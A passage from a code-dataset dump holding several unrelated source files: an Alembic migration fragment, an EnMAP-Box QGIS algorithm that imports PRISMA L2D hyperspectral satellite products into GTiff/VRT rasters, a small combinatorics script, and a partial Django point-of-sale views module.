###\n op.drop_table('listdb')\n # ### end Alembic commands ###\n","repo_name":"cgutwein/grocery-and-meal-assistant","sub_path":"flask/migrations/versions/6bd3e2ecaf38_listdb_table.py","file_name":"6bd3e2ecaf38_listdb_table.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37880282696","text":"from os.path import basename\r\nfrom typing import Dict, Any, List, Tuple, Optional\r\n\r\nimport numpy as np\r\nfrom osgeo import gdal\r\n\r\nfrom enmapbox.typeguard import typechecked\r\nfrom enmapboxprocessing.algorithm.createspectralindicesalgorithm import CreateSpectralIndicesAlgorithm\r\nfrom enmapboxprocessing.algorithm.importprismal1algorithm import utilsReadAsArray, utilsDeleteCopy\r\nfrom enmapboxprocessing.driver import Driver\r\nfrom enmapboxprocessing.enmapalgorithm import EnMAPProcessingAlgorithm, Group\r\nfrom enmapboxprocessing.rasterreader import RasterReader\r\nfrom enmapboxprocessing.rasterwriter import RasterWriter\r\nfrom enmapboxprocessing.utils import Utils\r\nfrom qgis.core import QgsProcessingContext, QgsProcessingFeedback, QgsProcessingException, QgsRectangle, \\\r\n QgsCoordinateReferenceSystem, QgsRasterLayer, QgsMapLayer\r\n\r\n\r\n@typechecked\r\nclass ImportPrismaL2DAlgorithm(EnMAPProcessingAlgorithm):\r\n P_FILE, _FILE = 'file', 'File'\r\n P_SPECTRAL_REGION, _SPECTRAL_REGION = 'spectralRegion', 'Spectral region'\r\n O_SPECTRAL_REGION = ['VNIR/SWIR combined', 'VNIR only', 'SWIR only', ]\r\n VnirSwirRegion, VnirRegion, SwirRegion, = range(3)\r\n P_BAD_BAND_THRESHOLD, _BAD_BAND_THRESHOLD = 'badBandThreshold', 'Bad band threshold'\r\n P_BAD_PIXEL_TYPE, _BAD_PIXEL_TYPE = 'badPixelType', 'Select bad pixel'\r\n O_BAD_PIXEL_TYPE = ['Invalid pixel from L1 product', 'Negative value after atmospheric correction',\r\n 'Saturated value after atmospheric correction']\r\n InvalidL1Pixel, NegativeAtmosphericCorrectionPixel, SaturatedAtmosphericCorrectionPixel = range(3)\r\n P_OUTPUT_SPECTRAL_CUBE, _OUTPUT_SPECTRAL_CUBE = 'outputPrismaL2D_spectralCube', 'Output VNIR/SWIR Cube raster layer'\r\n P_OUTPUT_PAN_CUBE, _OUTPUT_PAN_CUBE = 'outputPrismaL2D_panCube', 'Output PAN raster layer'\r\n\r\n P_OUTPUT_SPECTRAL_GEOLOCATION, _OUTPUT_SPECTRAL_GEOLOCATION = 'outputPrismaL2D_spectralGeolocationFields', \\\r\n 'Output VNIR/SWIR Geolocation Fields raster layer'\r\n P_OUTPUT_SPECTRAL_GEOMETRIC, _OUTPUT_SPECTRAL_GEOMETRIC = 'outputPrismaL2D_spectralGeometricFields', \\\r\n 'Output VNIR/SWIR Geometric Fields raster layer'\r\n P_OUTPUT_SPECTRAL_ERROR, _OUTPUT_SPECTRAL_ERROR = 'outputPrismaL2D_spectralErrorMatrix', \\\r\n 'Output VNIR/SWIR Error Matrix raster layer'\r\n P_OUTPUT_PAN_GEOLOCATION, _OUTPUT_PAN_GEOLOCATION = 'outputPrismaL2D_panGeolocationFields', \\\r\n 'Output PAN Geolocation Fields raster layer'\r\n P_OUTPUT_PAN_ERROR, _OUTPUT_PAN_ERROR = 'outputPrismaL2D_panErrorMatrix', \\\r\n 'Output PAN Error Matrix raster layer'\r\n\r\n def displayName(self):\r\n return 'Import PRISMA L2D product'\r\n\r\n def shortDescription(self):\r\n link = EnMAPProcessingAlgorithm.htmlLink(\r\n 'http://prisma.asi.it/missionselect/docs.php', 'PRISMA Documentation Area'\r\n )\r\n return 'Import PRISMA L2D product from HE5 file to QGIS/GDAL conform GTiff/VRT file format ' \\\r\n 'with proper coordinate reference system.' \\\r\n 'Note that for the spectral cube and error matrix, the interleave is transposed ' \\\r\n 'and stored as GTiff to enable proper visualization in QGIS.' 
\\\r\n               ' All other sub-datasets are stored as light-weight VRT files.\\n' \\\r\n               f'For further details visit the {link}.'\r\n\r\n    def helpParameters(self) -> List[Tuple[str, str]]:\r\n        return [\r\n            (self._FILE, 'The HE5 product file.\\n'\r\n                         'The main data contained in the PRS_L2d_HCO Swath is the surface spectral reflectance '\r\n                         'Coregistered Hyperspectral Cube (in instrument geometric reference).\\n'\r\n                         'The main data contained in the PRS_L2d_PCO Swath is the surface panchromatic reflectance '\r\n                         'image (in instrument geometric reference).\\n'\r\n                         'Instead of executing this algorithm, '\r\n                         'you may drag&drop the HE5 file directly from your system file browser '\r\n                         'a) onto the EnMAP-Box map view area, or b) onto the Sensor Product Import panel.'),\r\n            (self._SPECTRAL_REGION, 'Spectral region to be imported.'),\r\n            (self._BAD_BAND_THRESHOLD, 'If the proportion of erroneous pixels in the VNIR/SWIR Pixel Error Matrix '\r\n                                       'exceeds the bad band threshold (a value between 0 and 1), '\r\n                                       'the band is marked as a bad band.\\n'\r\n                                       'If specified, Output VNIR/SWIR Error Matrix raster layer needs to be '\r\n                                       'specified as well.'),\r\n            (self._BAD_PIXEL_TYPE, 'Pixels considered to be erroneous.'),\r\n            (self._OUTPUT_SPECTRAL_CUBE, 'VNIR/SWIR Cube GTiff raster file destination. '\r\n                                         'The surface spectral reflectance Coregistered Hyperspectral Cube '\r\n                                         '(in instrument geometric reference).'),\r\n            (self._OUTPUT_PAN_CUBE, 'PAN VRT raster file destination. '\r\n                                    'The surface panchromatic reflectance image (in instrument geometric reference).'),\r\n            (self._OUTPUT_SPECTRAL_GEOLOCATION, 'VNIR/SWIR Geolocation Fields VRT raster file destination. '\r\n                                                'Includes Latitude and Longitude bands.'),\r\n            (self._OUTPUT_SPECTRAL_GEOMETRIC, 'VNIR/SWIR Geometric Fields VRT raster file destination. '\r\n                                              'Includes Observing Angle, Relative Azimuth Angle and '\r\n                                              'Solar Zenith Angle bands.'),\r\n            (self._OUTPUT_SPECTRAL_ERROR, 'VNIR/SWIR Pixel Error Matrix GTiff raster file destination.'),\r\n            (self._OUTPUT_PAN_GEOLOCATION, 'PAN Geolocation Fields VRT raster file destination. 
'\r\n 'Includes Latitude and Longitude bands.'),\r\n (self._OUTPUT_PAN_ERROR, 'PAN Pixel Error Matrix VRT raster file destination.'),\r\n ]\r\n\r\n def group(self):\r\n return Group.ImportData.value\r\n\r\n def initAlgorithm(self, configuration: Dict[str, Any] = None):\r\n self.addParameterFile(self.P_FILE, self._FILE, extension='he5')\r\n self.addParameterEnum(self.P_SPECTRAL_REGION, self._SPECTRAL_REGION, self.O_SPECTRAL_REGION, False, 0)\r\n self.addParameterFloat(self.P_BAD_BAND_THRESHOLD, self._BAD_BAND_THRESHOLD, None, True, 0, 1, False)\r\n self.addParameterEnum(self.P_BAD_PIXEL_TYPE, self._BAD_PIXEL_TYPE, self.O_BAD_PIXEL_TYPE, True, [0], True)\r\n self.addParameterRasterDestination(self.P_OUTPUT_SPECTRAL_CUBE, self._OUTPUT_SPECTRAL_CUBE)\r\n self.addParameterVrtDestination(self.P_OUTPUT_PAN_CUBE, self._OUTPUT_PAN_CUBE, None, True, False)\r\n self.addParameterVrtDestination(\r\n self.P_OUTPUT_SPECTRAL_GEOLOCATION, self._OUTPUT_SPECTRAL_GEOLOCATION, None, True, False\r\n )\r\n self.addParameterVrtDestination(\r\n self.P_OUTPUT_SPECTRAL_GEOMETRIC, self._OUTPUT_SPECTRAL_GEOMETRIC, None, True, False\r\n )\r\n self.addParameterRasterDestination(self.P_OUTPUT_SPECTRAL_ERROR, self._OUTPUT_SPECTRAL_ERROR, None, True, False)\r\n self.addParameterVrtDestination(self.P_OUTPUT_PAN_GEOLOCATION, self._OUTPUT_PAN_GEOLOCATION, None, True, False)\r\n self.addParameterVrtDestination(self.P_OUTPUT_PAN_ERROR, self._OUTPUT_PAN_ERROR, None, True, False)\r\n\r\n def defaultParameters(self, file: str):\r\n return {\r\n self.P_FILE: file,\r\n self.P_OUTPUT_SPECTRAL_CUBE: file.replace('.he5', '_SPECTRAL.tif'),\r\n self.P_OUTPUT_PAN_CUBE: file.replace('.he5', '_PAN.vrt'),\r\n self.P_OUTPUT_SPECTRAL_GEOLOCATION: file.replace('.he5', '_SPECTRAL_GEOLOCATION.vrt'),\r\n self.P_OUTPUT_SPECTRAL_GEOMETRIC: file.replace('.he5', '_SPECTRAL_GEOMETRIC.vrt'),\r\n self.P_OUTPUT_SPECTRAL_ERROR: file.replace('.he5', '_SPECTRAL_ERROR.tif'),\r\n self.P_OUTPUT_PAN_GEOLOCATION: file.replace('.he5', '_PAN_GEOLOCATION.vrt'),\r\n self.P_OUTPUT_PAN_ERROR: file.replace('.he5', '_PAN_ERROR.vrt')\r\n }\r\n\r\n def isValidFile(self, file: str) -> bool:\r\n return basename(file).startswith('PRS_L2D') & \\\r\n basename(file).endswith('.he5')\r\n\r\n def openDataset(self, he5Filename: str, key: str) -> gdal.Dataset:\r\n key = key.replace(' ', '_')\r\n source = f'HDF5:\"\"\"{he5Filename}\"\"\"://{key}'\r\n ds: gdal.Dataset = gdal.Open(source)\r\n if ds is None:\r\n raise QgsProcessingException(f'unable to open PRISMA subdataset: {he5Filename}')\r\n return ds\r\n\r\n def processAlgorithm(\r\n self, parameters: Dict[str, Any], context: QgsProcessingContext, feedback: QgsProcessingFeedback\r\n ) -> Dict[str, Any]:\r\n he5Filename = self.parameterAsFile(parameters, self.P_FILE, context)\r\n\r\n spectralRegion = self.parameterAsEnum(parameters, self.P_SPECTRAL_REGION, context)\r\n badBandThreshold = self.parameterAsFloat(parameters, self.P_BAD_BAND_THRESHOLD, context)\r\n badPixelTypes = self.parameterAsEnums(parameters, self.P_BAD_PIXEL_TYPE, context)\r\n filenameSpectralCube = self.parameterAsOutputLayer(parameters, self.P_OUTPUT_SPECTRAL_CUBE, context)\r\n filenameSpectralGeolocation = self.parameterAsOutputLayer(\r\n parameters, self.P_OUTPUT_SPECTRAL_GEOLOCATION, context\r\n )\r\n filenameSpectralGeometric = self.parameterAsOutputLayer(parameters, self.P_OUTPUT_SPECTRAL_GEOMETRIC, context)\r\n filenameSpectralError = self.parameterAsOutputLayer(parameters, self.P_OUTPUT_SPECTRAL_ERROR, context)\r\n\r\n filenamePanCube = 
self.parameterAsOutputLayer(parameters, self.P_OUTPUT_PAN_CUBE, context)\r\n filenamePanGeolocation = self.parameterAsOutputLayer(parameters, self.P_OUTPUT_PAN_GEOLOCATION, context)\r\n filenamePanError = self.parameterAsOutputLayer(parameters, self.P_OUTPUT_PAN_ERROR, context)\r\n\r\n if badBandThreshold is not None:\r\n if filenameSpectralError is None:\r\n raise QgsProcessingException(f'Wrong or missing parameter value: {self._OUTPUT_SPECTRAL_ERROR}')\r\n\r\n with open(filenameSpectralCube + '.log', 'w') as logfile:\r\n feedback, feedback2 = self.createLoggingFeedback(feedback, logfile)\r\n self.tic(feedback, parameters, context)\r\n\r\n # check filename\r\n # e.g. 'PRS_L2D_STD_20201107101404_20201107101408_0001.he5'\r\n if not self.isValidFile(he5Filename):\r\n message = f'not a valid PRISMA L2D product: {he5Filename}'\r\n raise QgsProcessingException(message)\r\n\r\n badBandMultipliers = self.writeSpectralErrorMatrix(\r\n filenameSpectralError, he5Filename, spectralRegion, badBandThreshold, badPixelTypes, feedback\r\n )\r\n self.writeSpectralCube(filenameSpectralCube, he5Filename, spectralRegion, badBandMultipliers, feedback)\r\n self.writeSpectralGeolocationFields(filenameSpectralGeolocation, he5Filename)\r\n self.writeSpectralGeometricFields(filenameSpectralGeometric, he5Filename)\r\n\r\n self.writePanCube(filenamePanCube, he5Filename)\r\n self.writePanGeolocationFields(filenamePanGeolocation, he5Filename)\r\n self.writePanErrorMatrix(filenamePanError, he5Filename)\r\n\r\n utilsDeleteCopy(he5Filename)\r\n\r\n result = {\r\n self.P_OUTPUT_SPECTRAL_CUBE: filenameSpectralCube,\r\n self.P_OUTPUT_SPECTRAL_GEOLOCATION: filenameSpectralGeolocation,\r\n self.P_OUTPUT_SPECTRAL_GEOMETRIC: filenameSpectralGeometric,\r\n self.P_OUTPUT_SPECTRAL_ERROR: filenameSpectralError,\r\n self.P_OUTPUT_PAN_CUBE: filenamePanCube,\r\n self.P_OUTPUT_PAN_GEOLOCATION: filenamePanGeolocation,\r\n self.P_OUTPUT_PAN_ERROR: filenamePanError,\r\n }\r\n\r\n self.toc(feedback, result)\r\n\r\n return result\r\n\r\n def writeSpectralCube(\r\n self, filenameSpectralCube, he5Filename, spectralRegion, badBandMultipliers: Optional[List[int]],\r\n feedback\r\n ):\r\n parseFloatList = lambda text: [float(item) for item in text.split()]\r\n array = list()\r\n metadata = dict()\r\n wavelength = list()\r\n fwhm = list()\r\n # - VNIR\r\n if spectralRegion in [self.VnirSwirRegion, self.VnirRegion]:\r\n key = 'HDFEOS/SWATHS/PRS_L2D_HCO/Data Fields/VNIR_Cube'\r\n dsVnir = self.openDataset(he5Filename, key)\r\n arrayVnir = utilsReadAsArray(dsVnir, he5Filename, key, feedback)\r\n\r\n metadataVnir = dsVnir.GetMetadata('')\r\n selectedVnir = [v != 0 for v in parseFloatList(metadataVnir['List_Cw_Vnir'])]\r\n arrayVnir = np.transpose(arrayVnir, [1, 0, 2])[selectedVnir][::-1]\r\n wavelengthVnir = list(reversed(\r\n [float(v) for v, flag in zip(parseFloatList(metadataVnir['List_Cw_Vnir']), selectedVnir)\r\n if flag]\r\n ))\r\n fwhmVnir = list(reversed(\r\n [float(v) for v, flag in zip(parseFloatList(metadataVnir['List_Fwhm_Vnir']), selectedVnir)\r\n if flag]\r\n ))\r\n array.extend(arrayVnir)\r\n wavelength.extend(wavelengthVnir)\r\n fwhm.extend(fwhmVnir)\r\n metadata.update(metadataVnir)\r\n # - SWIR\r\n if spectralRegion in [self.VnirSwirRegion, self.SwirRegion]:\r\n key = 'HDFEOS/SWATHS/PRS_L2D_HCO/Data Fields/SWIR_Cube'\r\n dsSwir = self.openDataset(he5Filename, key)\r\n arraySwir = utilsReadAsArray(dsSwir, he5Filename, key, feedback)\r\n metadataSwir = dsSwir.GetMetadata('')\r\n selectedSwir = [v != 0 for v in 
parseFloatList(metadataSwir['List_Cw_Swir'])]\r\n arraySwir = np.transpose(arraySwir, [1, 0, 2])[selectedSwir][::-1]\r\n wavelengthSwir = list(reversed(\r\n [float(v) for v, flag in zip(parseFloatList(metadataSwir['List_Cw_Swir']), selectedSwir)\r\n if flag]\r\n ))\r\n fwhmSwir = list(reversed(\r\n [float(v) for v, flag in zip(parseFloatList(metadataSwir['List_Fwhm_Swir']), selectedSwir)\r\n if flag]\r\n ))\r\n array.extend(arraySwir)\r\n wavelength.extend(wavelengthSwir)\r\n fwhm.extend(fwhmSwir)\r\n metadata.update(metadataSwir)\r\n # - mask no data region\r\n mask = np.all(np.equal(array, 0), axis=0)\r\n array = np.clip(array, 1, None)\r\n array[:, mask] = 0\r\n assert len(wavelength) == len(array)\r\n assert len(fwhm) == len(array)\r\n crs, extent, geoTransform = self.spatialInfo(metadata, 30)\r\n driver = Driver(filenameSpectralCube)\r\n writer = driver.createFromArray(array, extent, crs)\r\n writer.setNoDataValue(0)\r\n writer.setMetadataDomain(metadata)\r\n for bandNo in range(1, writer.bandCount() + 1):\r\n wl = wavelength[bandNo - 1]\r\n writer.setBandName(f'Band {bandNo} ({wl} Nanometers)', bandNo)\r\n writer.setWavelength(wl, bandNo)\r\n writer.setFwhm(fwhm[bandNo - 1], bandNo)\r\n writer.setScale(1. / 65535., bandNo)\r\n\r\n print(f'{round(wl, 1)},{round(fwhm[bandNo - 1], 1)}')\r\n\r\n if badBandMultipliers is not None:\r\n for bandNo, badBandMultiplier in enumerate(badBandMultipliers, 1):\r\n writer.setBadBandMultiplier(badBandMultiplier, bandNo)\r\n\r\n writer.close()\r\n del writer\r\n\r\n # setup default renderer\r\n layer = QgsRasterLayer(filenameSpectralCube)\r\n reader = RasterReader(layer)\r\n redBandNo = reader.findWavelength(CreateSpectralIndicesAlgorithm.WavebandMapping['R'][0])\r\n greenBandNo = reader.findWavelength(CreateSpectralIndicesAlgorithm.WavebandMapping['G'][0])\r\n blueBandNo = reader.findWavelength(CreateSpectralIndicesAlgorithm.WavebandMapping['B'][0])\r\n redMin, redMax = reader.provider.cumulativeCut(redBandNo, 0.02, 0.98)\r\n greenMin, greenMax = reader.provider.cumulativeCut(greenBandNo, 0.02, 0.98)\r\n blueMin, blueMax = reader.provider.cumulativeCut(blueBandNo, 0.02, 0.98)\r\n renderer = Utils().multiBandColorRenderer(\r\n reader.provider, [redBandNo, greenBandNo, blueBandNo], [redMin, greenMin, blueMin],\r\n [redMax, greenMax, blueMax]\r\n )\r\n layer.setRenderer(renderer)\r\n layer.saveDefaultStyle(QgsMapLayer.StyleCategory.Rendering)\r\n\r\n def writeSpectralErrorMatrix(\r\n self, filenameSpectralError, he5Filename, spectralRegion, badPixelThreshold: Optional[float],\r\n badPixelTypes: List[int], feedback: QgsProcessingFeedback\r\n ) -> Optional[List[int]]:\r\n if filenameSpectralError is None:\r\n return None\r\n parseFloatList = lambda text: [float(item) for item in text.split()]\r\n array = list()\r\n metadata = dict()\r\n wavelength = list()\r\n # - VNIR\r\n if spectralRegion in [self.VnirSwirRegion, self.VnirRegion]:\r\n key = 'HDFEOS/SWATHS/PRS_L2D_HCO/Data Fields/VNIR_PIXEL_L2_ERR_MATRIX'\r\n dsVnir = self.openDataset(he5Filename, key)\r\n arrayVnir = utilsReadAsArray(dsVnir, he5Filename, key, feedback)\r\n metadataVnir = dsVnir.GetMetadata('')\r\n selectedVnir = [v != 0 for v in parseFloatList(metadataVnir['List_Cw_Vnir'])]\r\n arrayVnir = np.transpose(arrayVnir, [1, 0, 2])[selectedVnir][::-1]\r\n wavelengthVnir = list(reversed(\r\n [float(v) for v, flag in zip(parseFloatList(metadataVnir['List_Cw_Vnir']), selectedVnir)\r\n if flag]\r\n ))\r\n array.extend(arrayVnir)\r\n wavelength.extend(wavelengthVnir)\r\n 
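# VNIR and SWIR metadata are merged into a single dictionary below and later\r\n            # attached to the error raster via setMetadataDomain.\r\n            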
metadata.update(metadataVnir)\r\n # - SWIR\r\n if spectralRegion in [self.VnirSwirRegion, self.SwirRegion]:\r\n key = 'HDFEOS/SWATHS/PRS_L2D_HCO/Data Fields/SWIR_PIXEL_L2_ERR_MATRIX'\r\n dsSwir = self.openDataset(he5Filename, key)\r\n arraySwir = utilsReadAsArray(dsSwir, he5Filename, key, feedback)\r\n metadataSwir = dsSwir.GetMetadata('')\r\n selectedSwir = [v != 0 for v in parseFloatList(metadataSwir['List_Cw_Swir'])]\r\n arraySwir = np.transpose(arraySwir, [1, 0, 2])[selectedSwir][::-1]\r\n wavelengthSwir = list(reversed(\r\n [float(v) for v, flag in zip(parseFloatList(metadataSwir['List_Cw_Swir']), selectedSwir)\r\n if flag]\r\n ))\r\n array.extend(arraySwir)\r\n wavelength.extend(wavelengthSwir)\r\n metadata.update(metadataSwir)\r\n # - mask no data region\r\n assert len(wavelength) == len(array)\r\n crs, extent, geoTransform = self.spatialInfo(metadata, 30)\r\n driver = Driver(filenameSpectralError, feedback=feedback)\r\n writer = driver.createFromArray(array, extent, crs)\r\n writer.setMetadataDomain(metadata)\r\n for bandNo in range(1, writer.bandCount() + 1):\r\n wl = wavelength[bandNo - 1]\r\n writer.setBandName(f'Pixel Error Band {bandNo} ({wl} Nanometers)', bandNo)\r\n writer.setWavelength(wl, bandNo)\r\n\r\n # bad pixel thresholding\r\n if badPixelThreshold is None:\r\n badBandMultipliers = None\r\n else:\r\n badBandMultipliers = list()\r\n for bandNo, a in enumerate(array, 1):\r\n badPixelMask = np.full_like(a, False, bool)\r\n # Note that we just compare against individual bit flags.\r\n # That should be fine, because all flags are mutually exclusive.\r\n # We wouldn't expect values other than 0, 1, 2 and 4.'\r\n if self.InvalidL1Pixel in badPixelTypes:\r\n np.logical_or(badPixelMask, a == 1, out=badPixelMask)\r\n if self.NegativeAtmosphericCorrectionPixel in badPixelTypes:\r\n np.logical_or(badPixelMask, a == 2, out=badPixelMask)\r\n if self.SaturatedAtmosphericCorrectionPixel in badPixelTypes:\r\n np.logical_or(badPixelMask, a == 4, out=badPixelMask)\r\n badPixelProportion = np.mean(badPixelMask)\r\n message = f'Band {bandNo} bad pixel proportion: {round(badPixelProportion, 4)}'\r\n if badPixelProportion < badPixelThreshold:\r\n badBandMultiplier = 1\r\n else:\r\n badBandMultiplier = 0\r\n message += ' (marked as bad band)'\r\n badBandMultipliers.append(badBandMultiplier)\r\n feedback.pushInfo(message)\r\n\r\n return badBandMultipliers\r\n\r\n def writeSpectralGeolocationFields(self, filenameSpectralGeolocation, he5Filename):\r\n if filenameSpectralGeolocation is None:\r\n return\r\n ds1 = self.openDataset(he5Filename, 'HDFEOS/SWATHS/PRS_L2D_HCO/Geolocation_Fields/Longitude')\r\n ds2 = self.openDataset(he5Filename, 'HDFEOS/SWATHS/PRS_L2D_HCO/Geolocation_Fields/Latitude')\r\n metadata = ds1.GetMetadata('')\r\n crs, extent, geoTransform = self.spatialInfo(metadata, 30)\r\n ds: gdal.Dataset = gdal.BuildVRT(filenameSpectralGeolocation, [ds1, ds2], separate=True)\r\n ds.SetProjection(crs.toWkt())\r\n ds.SetGeoTransform(geoTransform)\r\n writer = RasterWriter(ds)\r\n writer.setMetadataDomain(metadata)\r\n writer.setBandName('Longitude', 1)\r\n writer.setBandName('Latitude', 2)\r\n\r\n def writeSpectralGeometricFields(self, filenameSpectralGeometric, he5Filename):\r\n if filenameSpectralGeometric is None:\r\n return\r\n ds1 = self.openDataset(he5Filename, 'HDFEOS/SWATHS/PRS_L2D_HCO/Geometric_Fields/Observing_Angle')\r\n ds2 = self.openDataset(he5Filename, 'HDFEOS/SWATHS/PRS_L2D_HCO/Geometric_Fields/Rel_Azimuth_Angle')\r\n ds3 = self.openDataset(he5Filename, 
'HDFEOS/SWATHS/PRS_L2D_HCO/Geometric_Fields/Solar_Zenith_Angle')\r\n        metadata = ds1.GetMetadata('')\r\n        crs, extent, geoTransform = self.spatialInfo(metadata, 30)\r\n        ds: gdal.Dataset = gdal.BuildVRT(filenameSpectralGeometric, [ds1, ds2, ds3], separate=True)\r\n        ds.SetProjection(crs.toWkt())\r\n        ds.SetGeoTransform(geoTransform)\r\n        writer = RasterWriter(ds)\r\n        writer.setMetadataDomain(metadata)\r\n        writer.setNoDataValue(0)\r\n        writer.setBandName('Observing Angle', 1)\r\n        writer.setBandName('Relative Azimuth Angle', 2)\r\n        writer.setBandName('Solar Zenith Angle', 3)\r\n\r\n    def writePanCube(self, filenamePanCube, he5Filename):\r\n        if filenamePanCube is None:\r\n            return\r\n        ds1 = self.openDataset(he5Filename, 'HDFEOS/SWATHS/PRS_L2D_PCO/Data_Fields/Cube')\r\n        metadata = ds1.GetMetadata('')\r\n        crs, extent, geoTransform = self.spatialInfo(metadata, 5)\r\n        ds: gdal.Dataset = gdal.BuildVRT(filenamePanCube, [ds1], separate=True)\r\n        ds.SetProjection(crs.toWkt())\r\n        ds.SetGeoTransform(geoTransform)\r\n        writer = RasterWriter(ds)\r\n        writer.setMetadataDomain(metadata)\r\n        writer.setNoDataValue(0)\r\n        writer.setScale(1. / 65535., 1)\r\n        writer.setBandName('Panchromatic', 1)\r\n\r\n    def writePanGeolocationFields(self, filenamePanGeolocation, he5Filename):\r\n        if filenamePanGeolocation is None:\r\n            return\r\n        ds1 = self.openDataset(he5Filename, 'HDFEOS/SWATHS/PRS_L2D_PCO/Geolocation_Fields/Longitude')\r\n        ds2 = self.openDataset(he5Filename, 'HDFEOS/SWATHS/PRS_L2D_PCO/Geolocation_Fields/Latitude')\r\n        metadata = ds1.GetMetadata('')\r\n        crs, extent, geoTransform = self.spatialInfo(metadata, 5)\r\n        ds: gdal.Dataset = gdal.BuildVRT(filenamePanGeolocation, [ds1, ds2], separate=True)\r\n        ds.SetProjection(crs.toWkt())\r\n        ds.SetGeoTransform(geoTransform)\r\n        writer = RasterWriter(ds)\r\n        writer.setMetadataDomain(metadata)\r\n        writer.setBandName('Longitude', 1)\r\n        writer.setBandName('Latitude', 2)\r\n\r\n    def writePanErrorMatrix(self, filenamePanError, he5Filename):\r\n        if filenamePanError is None:\r\n            return\r\n        ds1 = self.openDataset(he5Filename, 'HDFEOS/SWATHS/PRS_L2D_PCO/Data_Fields/PIXEL_L2_ERR_MATRIX')\r\n        metadata = ds1.GetMetadata('')\r\n        crs, extent, geoTransform = self.spatialInfo(metadata, 5)\r\n        ds: gdal.Dataset = gdal.BuildVRT(filenamePanError, [ds1], separate=True)\r\n        ds.SetProjection(crs.toWkt())\r\n        ds.SetGeoTransform(geoTransform)\r\n        writer = RasterWriter(ds)\r\n        writer.setMetadataDomain(metadata)\r\n        writer.setBandName('PAN Band Pixel Error', 1)\r\n\r\n    def spatialInfo(self, metadata, res):\r\n        extent = QgsRectangle(\r\n            float(metadata['Product_ULcorner_easting']) - res / 2,\r\n            float(metadata['Product_LRcorner_northing']) - res / 2,\r\n            float(metadata['Product_LRcorner_easting']) + res / 2,\r\n            float(metadata['Product_ULcorner_northing']) + res / 2\r\n        )\r\n        crs = QgsCoordinateReferenceSystem.fromEpsgId(int(metadata['Epsg_Code']))\r\n        geoTransform = (extent.xMinimum(), res, -0., extent.yMaximum(), -0., -res)\r\n        return crs, extent, geoTransform\r\n","repo_name":"EnMAP-Box/enmap-box","sub_path":"enmapboxprocessing/algorithm/importprismal2dalgorithm.py","file_name":"importprismal2dalgorithm.py","file_ext":"py","file_size_in_byte":25699,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"52"} +{"seq_id":"26529214291","text":"def gen(start):\n    if start == 10:\n        return [[]]\n    ans = []\n    for i in range(start, 10):\n        for opt in gen(i+1):\n            ans.append([[start, i]] + opt)\n    return ans\n\nprint(str(gen(0)).replace(\"[\", \"{\").replace(\"]\", 
\"}\"))","repo_name":"cormackikkert/competitive-programming","sub_path":"AtCoder/Beginner 159/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72742395045","text":"import json\nimport pandas as pd\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom pointofsale.forms import AddCategoryForm, AddProductForm, UpdateProductForm\nfrom django.contrib.auth.models import User\nfrom django.views.generic import CreateView, ListView, DetailView, View\nfrom pointofsale.models import Product, Purchase, PurchaseItem, Accounting\nfrom django.core.files.storage import FileSystemStorage\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils import timezone\nfrom django.http import FileResponse\nfrom django.db.models import Sum\nimport datetime\n\n# Create your views here.\ndef home(request):\n return render(request, 'pointofsale/home.html')\n\ndef dashboard(request):\n products = Product.objects.all()\n total_sales = Purchase.objects.aggregate(Sum('total_amount'))['total_amount__sum']\n total_expenses = Product.objects.aggregate(Sum('total_cost_price'))['total_cost_price__sum']\n purchase_number = Purchase.objects.filter(purchased=True).count()\n category_form = AddCategoryForm()\n product_form = AddProductForm()\n update_form = UpdateProductForm()\n context = {\n 'category_form': category_form, \n 'product_form': product_form,\n 'update_form': update_form,\n 'products': products,\n 'purchase_number': purchase_number,\n 'total_sales': total_sales,\n 'total_expenses': total_expenses,\n }\n return render(request, 'pointofsale/dashboard.html', context)\n\n\n\ndef inventory(request):\n products = Product.objects.all()\n category_form = AddCategoryForm()\n product_form = AddProductForm()\n update_form = UpdateProductForm()\n context = {\n 'category_form': category_form, \n 'product_form': product_form,\n 'update_form': update_form,\n 'products': products,\n }\n return render(request, 'pointofsale/inventory.html', context)\n\ndef accounting(request):\n products = Product.objects.all()\n accounting = Accounting.objects.all()\n total_sales = Purchase.objects.aggregate(Sum('total_amount'))['total_amount__sum']\n total_expenses = Product.objects.aggregate(Sum('total_cost_price'))['total_cost_price__sum']\n purchase_number = Purchase.objects.filter(purchased=True).count()\n if total_expenses == None and total_sales == None:\n profit_loss = None\n else:\n profit_loss = total_sales - total_expenses\n context = {\n 'products': products, \n 'purchase_number': purchase_number,\n 'total_sales': total_sales,\n 'total_expenses': total_expenses,\n 'profit_loss': profit_loss,\n }\n return render(request, 'pointofsale/accounting.html', context)\n\n\ndef filter_date(request):\n selected_month = request.GET['month']\n if selected_month == 'January':\n selected_month_int = 1\n elif selected_month == 'February':\n selected_month_int = 2\n elif selected_month == 'March':\n selected_month_int = 3\n elif selected_month == 'April':\n selected_month_int = 4\n elif selected_month == 'May':\n selected_month_int = 5\n elif selected_month == 'June':\n selected_month_int = 6\n elif selected_month == 'July':\n selected_month_int = 7\n elif selected_month == 'August':\n selected_month_int = 8\n elif selected_month == 
'September':\n selected_month_int = 9\n elif selected_month == 'October':\n selected_month_int = 10\n elif selected_month == 'November':\n selected_month_int = 11\n elif selected_month == 'December':\n selected_month_int = 12\n purchase_item_qs = PurchaseItem.objects.filter(month=selected_month_int)\n if purchase_item_qs.exists():\n purchase_item = purchase_item_qs[0]\n total_sales_by_month = Purchase.objects.filter(month=selected_month_int).aggregate(Sum('total_amount'))['total_amount__sum']\n context = {'purchases': purchase_item_qs, 'selected_month': selected_month, 'total_sales_by_month':total_sales_by_month}\n return render(request, 'pointofsale/report.html', context)\n\n else:\n purchases = PurchaseItem.objects.all()\n context = {'purchases': purchases}\n return render(request, 'pointofsale/report.html')\n\ndef report(request):\n purchases = PurchaseItem.objects.all()\n total_sales = Purchase.objects.aggregate(Sum('total_amount'))['total_amount__sum']\n context = {\n 'purchases': purchases,\n 'total_sales': total_sales,\n }\n return render(request, 'pointofsale/report.html', context)\n\ndef add_category(request):\n if request.method == 